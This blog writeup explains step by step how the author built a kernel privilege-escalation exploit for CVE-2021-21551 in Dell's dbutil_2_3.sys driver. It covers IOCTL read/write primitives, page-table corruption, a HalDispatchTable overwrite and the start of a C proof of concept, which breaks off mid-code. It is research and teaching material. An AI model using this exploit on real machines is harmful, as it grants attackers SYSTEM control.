Connor McGarr

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

16 May 2021 at 00:00

Introduction

Recently I said I was going to focus on browser exploitation, since Advanced Windows Exploitation (AWE) had been canceled. With AWE now canceled two years in a row, I found myself craving a binary exploitation training, so I enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Satoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr is that there is an IOCTL code that any client can trigger with a call to DeviceIoControl, and the handler eventually reaches a memmove routine whose arguments are taken from the user-supplied buffer.

Let’s get started with the analysis. As is customary in kernel exploits, we first need a way to interact with the driver, so the first step is to obtain a handle to it. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with it. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link that references it, and this symbolic link is what allows clients to interact with the driver. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel-mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\.\DBUtil_2_3 (written as \\\\.\\DBUtil_2_3 in a C string literal, where each backslash must be escaped).
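To make the escaping concrete, here is a minimal sketch of the path string on its own. The helper names dbutil_device_path and dbutil_device_path_length are made up for illustration and are not part of the final POC; the string itself is the one passed to CreateFileA later on.

```c
#include <string.h>

/* Hypothetical helper: returns the Win32 device path for the driver's
   symbolic link. Each backslash is doubled in C source, so the string
   the OS actually receives is \\.\DBUtil_2_3 */
const char *dbutil_device_path(void)
{
    return "\\\\.\\DBUtil_2_3";
}

/* Hypothetical helper: length of the path as seen at run time. */
size_t dbutil_device_path_length(void)
{
    return strlen(dbutil_device_path());
}
```

The run-time string is 14 characters long: the four-character \\.\ prefix followed by the ten-character link name.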

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function takes the handle to the driver as an argument and allows us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t foolproof, is to look for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs, and drivers, especially enterprise-grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.
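As a side note, an IOCTL code is not an opaque number. It packs four fields using the layout of the CTL_CODE macro from the Windows headers. The sketch below decodes those fields in portable C; the struct and function names are my own and are only for illustration.

```c
#include <stdint.h>

/* Fields packed into a Windows I/O control code (CTL_CODE layout). */
typedef struct {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14, 0 = FILE_ANY_ACCESS */
    uint32_t function;    /* bits 13..2 */
    uint32_t method;      /* bits 1..0, 0 = METHOD_BUFFERED */
} ioctl_fields;

/* Split a 32-bit IOCTL code into its four fields. */
ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2) & 0xFFF;
    f.method      = code & 0x3;
    return f;
}
```

Decoding 0x9B0C1EC8 this way gives device type 0x9B0C, function 0x7B2, access 0 and method 0. A method of 0 is METHOD_BUFFERED, meaning the I/O manager copies the caller's buffer into a kernel-mode buffer before the driver sees it.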

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction executes, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides. We can see this in the function by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.
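For reference, here is the standard C prototype of memmove together with a tiny user-mode demonstration of why controlling its first two arguments amounts to a write-what-where. The helper overwrite_qword is a made-up name for illustration; it runs entirely in user mode and does not touch the driver.

```c
#include <stdint.h>
#include <string.h>

/* Standard prototype:
 *   void *memmove(void *dest, const void *src, size_t count);
 * Under the x64 Windows calling convention, dest is passed in RCX,
 * src in RDX and count in R8. */

/* Hypothetical helper: copy one QWORD ("what") to an address ("where"). */
uint64_t overwrite_qword(uint64_t *where, uint64_t what)
{
    memmove(where, &what, sizeof(what));
    return *where;
}
```

Whoever chooses where and what decides which 8 bytes of memory change and what they become, which is exactly the primitive we are after in kernel mode.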

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub_15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sub rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and an NTSTATUS code of 0xC000000D, which means STATUS_INVALID_PARAMETER, is returned back to the client. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will need to send at least 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_15294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr [rsp+0x30] instruction, which loads the 32-bit value stored on the stack at RSP+0x30 into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts pointers to memory. Since we passed raw junk values, these addresses are invalid. Because of this, let’s switch up our POC a bit again to see if we can get the desired result. Let’s use KUSER_SHARED_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the routine, before reaching the call to memmove, reads our buffer at offsets 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, four 0x42 bytes (0x42424242) will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue, however, is with the destination address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination address. This time, if we resend the exploit and replace 0x4242424242424242 with 0x0000000000000000, we can “bypass” this issue by having a value of 0 added, meaning our target address will remain unmangled.
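Putting the observations so far together, the 0x20-byte input buffer can be pictured as four QWORD slots. The struct below is only my reading of the debugger output. The driver does not publish any such definition, and the type and field names are invented for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of the 0x20-byte request (names are illustrative). */
typedef struct {
    uint64_t filler;   /* 0x00: 0x4141414141414141 in the POC */
    uint64_t address;  /* 0x08: address handed to memmove */
    uint64_t offset;   /* 0x10: low 32 bits are added to the address */
    uint64_t value;    /* 0x18: data that gets copied */
} dbutil_request;

/* Hypothetical helper: the address memmove ends up using. */
uint64_t effective_address(const dbutil_request *req)
{
    return req->address + (uint32_t)req->offset;
}
```

With offset set to zero, effective_address returns the address unchanged, which is why zeroing the third QWORD keeps the target unmangled.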

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!
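To summarize the write path, here is a user-mode stand-in for what the handler appears to do with our buffer. This is a sketch under assumptions, not the driver's code: the function name is invented, the copy length of size minus 0x18 is my guess from the 0x20-byte buffer moving exactly one QWORD, and it assumes a 64-bit host.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du

/* Hypothetical mock of the write path reached via IOCTL 0x9B0C1EC8. */
uint32_t mock_write_handler(const uint64_t *buf, size_t size)
{
    /* Mirrors the cmp ecx, 0x18 check: short buffers are rejected. */
    if (size < 0x18)
        return STATUS_INVALID_PARAMETER;

    /* Destination: QWORD at 0x8 plus the low 32 bits of the QWORD at 0x10. */
    uintptr_t dest = (uintptr_t)(buf[1] + (uint32_t)buf[2]);

    /* Source: the bytes after the 0x18-byte header (assumed length). */
    memmove((void *)dest, &buf[3], size - 0x18);
    return STATUS_SUCCESS;
}
```

Calling it with a four-QWORD array whose second element holds the address of a local variable overwrites that variable with the fourth element, the same shape as the kernel-mode write shown above.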

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where we write the data). However, recall from the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means that at some point between our invocation of DeviceIoControl and the memmove call, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can overwrite whatever that address points to, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343, we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to?

This means, instead of having something like this for the target address:

ffffc605`24e82998	43434343`43434343

What if we could just pass our own data as such:

43434343`43434343	DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if memmove writes the data to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to call this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially do the inverse of what we did with the arbitrary write primitive.

When I talked through my thought process with a peer of mine, VoidSec, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instructions, we can see our input buffer for the read primitive is being propagated and set up for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into our exploitation path.
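The read path can be mocked in user mode the same way. Again this is a sketch under assumptions rather than the driver's logic: the function name is invented, the copy length of size minus 0x18 is a guess, the QWORD at 0x10 is left at zero as in the POC so it is ignored here, and a 64-bit host is assumed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du

/* Hypothetical mock of the read path reached via IOCTL 0x9B0C1EC4.
   The same array serves as input and output buffer, as in the POC. */
uint32_t mock_read_handler(uint64_t *buf, size_t size)
{
    if (size < 0x18)
        return STATUS_INVALID_PARAMETER;

    /* Source: the address we supplied in the QWORD at 0x8. */
    const void *src = (const void *)(uintptr_t)buf[1];

    /* Destination: the tail of the buffer, which is handed back to us. */
    memmove(&buf[3], src, size - 0x18);
    return STATUS_SUCCESS;
}
```

After the call, the last array element holds whatever the supplied address pointed to, which matches the POC reading its result out of the fourth QWORD.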

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate the address of the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know that we want to write to an offset of 0x3000 (offset to .data) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could also use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation present in Windows 10 since version 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The kernel function nt!MiGetPteAddress (an internal routine, not a documented API) contains the base of the page table entries at an offset of 0x13, populated dynamically, because the function uses this base to compute the PTE address for a given virtual address.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.
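The calculation itself is three operations, the same ones the POC performs inline. Here it is as a standalone function; the name pte_address is mine, and the fixed base used in the example afterwards is the well-known pre-1607 value, chosen only so the arithmetic can be checked by hand.

```c
#include <stdint.h>

/* Replicates the arithmetic of nt!MiGetPteAddress for a 4-level layout. */
uint64_t pte_address(uint64_t virtual_address, uint64_t pte_base)
{
    /* (va >> 12) is the page number and each PTE is 8 bytes,
       so (va >> 12) * 8 collapses to a single shift right by 9. */
    uint64_t pte = virtual_address >> 9;

    /* Keep the 36 page-number bits and force 8-byte alignment. */
    pte &= 0x7FFFFFFFF8ULL;

    /* Index into the PTE array. */
    return pte + pte_base;
}
```

For example, with the non-randomized base 0xFFFFF68000000000, the address 0xFFFFF78000000000 maps to the PTE at 0xFFFFF6FBC0000000. Any address inside the same 4 KB page, such as 0xFFFFF78000000800, yields the same PTE.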

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later.

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!
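On x86-64, the no-eXecute flag is bit 63 of a page table entry, so the modification boils down to clearing a single bit. The helpers below are a minimal sketch of that idea with made-up names, and the PTE value in the example is invented, not one taken from the target system.

```c
#include <stdint.h>

/* Bit 63 of an x86-64 page table entry is the no-eXecute (NX) flag. */
#define PTE_NX_BIT (1ULL << 63)

/* Hypothetical helper: return the PTE value with NX cleared. */
uint64_t pte_make_executable(uint64_t pte)
{
    return pte & ~PTE_NX_BIT;
}

/* Hypothetical helper: non-zero when the page is executable. */
int pte_is_executable(uint64_t pte)
{
    return (pte & PTE_NX_BIT) == 0;
}
```

For an illustrative entry of 0x8A00000012345863, clearing NX gives 0x0A00000012345863. Every other bit, including the physical frame number and the writable bit, is left as it was.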

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer at nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, it will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.
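The preserve, overwrite, trigger, restore sequence is easier to see in miniature. The sketch below plays it out in user mode on an ordinary array of function pointers. Everything in it (the table, the handlers, the function names) is a stand-in invented for illustration and has nothing to do with the real nt!HalDispatchTable layout beyond slot 1 sitting at offset 0x8 on a 64-bit build.

```c
/* Function pointer type for the toy dispatch table. */
typedef int (*dispatch_fn)(void);

int original_handler(void) { return 1; }   /* stands in for the HAL routine */
int payload(void)          { return 42; }  /* stands in for our shellcode */

/* Toy dispatch table; slot 1 is at offset 0x8 with 8-byte pointers. */
dispatch_fn dispatch_table[2] = { original_handler, original_handler };

/* Save slot 1, point it at the replacement, trigger it, put it back. */
int hijack_call_restore(dispatch_fn replacement)
{
    dispatch_fn saved = dispatch_table[1];  /* read primitive: preserve */
    dispatch_table[1] = replacement;        /* write primitive: overwrite */
    int result = dispatch_table[1]();       /* the indirect call fires */
    dispatch_table[1] = saved;              /* write primitive: restore */
    return result;
}
```

Restoring the saved pointer right after the call is what keeps later, legitimate callers of the slot working.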

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of nt!KeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it a part of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!
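As a rough model of that fallback check, here is a one-line predicate. It rests on the assumption that the test reduces to looking at the most significant bit of the target; the real routine is hand-written assembly and may do more, and the function name is my own.

```c
#include <stdint.h>

/* Hypothetical model: kernel-mode (upper-half) addresses have bit 63 set,
   user-mode (lower-half) addresses have it clear. */
int is_kernel_mode_address(uint64_t address)
{
    return (address >> 63) != 0;
}
```

An address such as 0xFFFFF78000000000 passes this test, while a typical user-mode address such as 0x00007FF712340000 fails it, which is the case that leads to the bug check.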

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <stdlib.h>	// exit()
#include <string.h>	// strcmp()
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
	// Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
	LPVOID lpImageBase[1024];
	DWORD lpcbNeeded;
	int drivers;
	char lpFileName[1024];
	unsigned long long imageBase = 0;	// Stays 0 if the driver is not found

	BOOL baseofDrivers = EnumDeviceDrivers(
		lpImageBase,
		sizeof(lpImageBase),
		&lpcbNeeded
	);

	// Error handling
	if (!baseofDrivers)
	{
		printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %lu\n", GetLastError());
		exit(1);
	}

	// Defining number of drivers for GetDeviceDriverBaseNameA()
	drivers = lpcbNeeded / sizeof(lpImageBase[0]);

	// Parsing loaded drivers
	for (int i = 0; i < drivers; i++)
	{
		GetDeviceDriverBaseNameA(
			lpImageBase[i],
			lpFileName,
			sizeof(lpFileName) / sizeof(char)
		);

		// Keep looping, until found, to find user supplied driver base address
		if (!strcmp(name, lpFileName))
		{
			imageBase = (unsigned long long)lpImageBase[i];

			// Exit loop
			break;
		}
	}

	return imageBase;
}


void exploitWork(void)
{
	// Store the base of the kernel
	unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

	// Storing the base of the driver
	unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

	// Print updates
	printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
	printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

	// Store nt!MiGetPteAddress+0x13
	unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

	// Obtain a handle to the driver
	HANDLE driverHandle = CreateFileA(
		"\\\\.\\DBUtil_2_3",
		GENERIC_READ | GENERIC_WRITE,				// dwDesiredAccess
		FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,	// dwShareMode
		NULL,
		OPEN_EXISTING,
		0x0,
		NULL
	);

	// Error handling
	if (driverHandle == INVALID_HANDLE_VALUE)
	{
		printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
		exit(-1);
	}
	else
	{
		printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

